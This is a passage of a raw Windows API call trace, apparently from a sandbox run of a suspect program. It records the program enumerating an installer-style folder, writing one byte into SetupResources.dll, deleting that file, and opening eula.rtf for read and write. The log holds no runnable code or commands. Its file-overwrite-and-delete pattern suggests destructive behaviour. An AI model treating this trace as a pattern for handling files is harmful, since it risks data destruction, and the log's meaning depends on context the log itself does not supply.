0x7d090 [0061.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0061.807] AreFileApisANSI () returned 1 [0061.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71b68 [0061.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 46 [0061.807] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.808] GetFileType (hFile=0x428) returned 0x1 [0061.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0061.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0061.808] GetLastError () returned 0xb7 [0061.808] SetLastError (dwErrCode=0xb7) [0061.808] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0061.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0061.809] CloseHandle (hObject=0x428) returned 1 [0061.809] AreFileApisANSI () returned 1 [0061.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a30 [0061.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 46 [0061.809] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll")) returned 1 [0061.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0061.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0061.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0061.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0061.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0061.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0061.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0061.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0061.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0061.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0061.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0061.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0061.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.811] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.811] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.811] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4f6, ftLastWriteTime.dwHighDateTime=0x1, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="̮", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧肐\x07̧비聐螘\x08賂̧")) returned 0 [0061.811] FindClose (in: hFindFile=0x78090 | out: hFindFile=0x78090) returned 1 [0061.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0061.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0061.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0061.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0061.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46128 | out: hHeap=0x20000) returned 1 [0061.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0061.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0061.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0061.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0061.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0061.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0061.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0061.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0061.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0061.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0061.811] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.812] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.812] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.812] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.812] AreFileApisANSI () returned 1 [0061.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1030", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1030", lpUsedDefaultChar=0x0) returned 27 [0061.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.812] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.812] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0061.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0061.812] AreFileApisANSI () returned 1 [0061.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78610 [0061.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x78610, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030") returned 27 [0061.812] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030" (normalized: "c:\\588bce7c90097ed212\\1030"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.812] GetLastError () returned 0x5 [0061.812] GetLastError () returned 0x5 [0061.812] SetLastError (dwErrCode=0x5) [0061.812] GetLastError () returned 0x5 [0061.812] SetLastError (dwErrCode=0x5) [0061.812] GetLastError () returned 0x5 [0061.812] SetLastError (dwErrCode=0x5) [0061.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78610 | out: hHeap=0x20000) returned 1 [0061.813] AreFileApisANSI () returned 1 [0061.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78190 [0061.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x78190, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030") returned 27 [0061.813] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030" (normalized: "c:\\588bce7c90097ed212\\1030"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.813] GetLastError () returned 0x5 [0061.813] GetLastError () returned 0x5 [0061.813] SetLastError (dwErrCode=0x5) [0061.813] GetLastError () returned 0x5 [0061.813] SetLastError (dwErrCode=0x5) [0061.813] GetLastError () returned 0x5 [0061.813] SetLastError (dwErrCode=0x5) [0061.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78190 | out: hHeap=0x20000) returned 1 [0061.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0061.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.813] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0061.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.813] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0061.813] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="1031", cAlternateFileName="")) returned 1 [0061.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0061.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0061.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0061.813] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.813] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1030\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78210 [0061.814] FindNextFileW (in: hFindFile=0x78210, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.814] FindNextFileW (in: hFindFile=0x78210, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xcf2, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.814] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.814] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0061.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0061.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0061.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0061.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0061.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0061.815] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0061.815] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0061.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0061.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71b68 [0061.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0061.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0061.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0061.816] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.816] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.816] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.816] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0061.816] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.816] AreFileApisANSI () returned 1 [0061.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1030\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1030\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0061.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0061.816] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.816] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0061.816] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0061.817] AreFileApisANSI () returned 1 [0061.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.817] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0061.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 36 [0061.817] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.817] GetFileType (hFile=0x428) returned 0x1 [0061.817] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0061.817] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0061.818] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0061.818] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0061.818] CloseHandle (hObject=0x428) returned 1 [0061.818] AreFileApisANSI () returned 1 [0061.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.818] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0061.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 36 [0061.818] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.818] GetFileType (hFile=0x428) returned 0x1 [0061.818] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0061.818] CloseHandle (hObject=0x428) returned 1 [0061.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0061.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0061.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0061.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0061.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0061.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0061.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0061.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0061.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 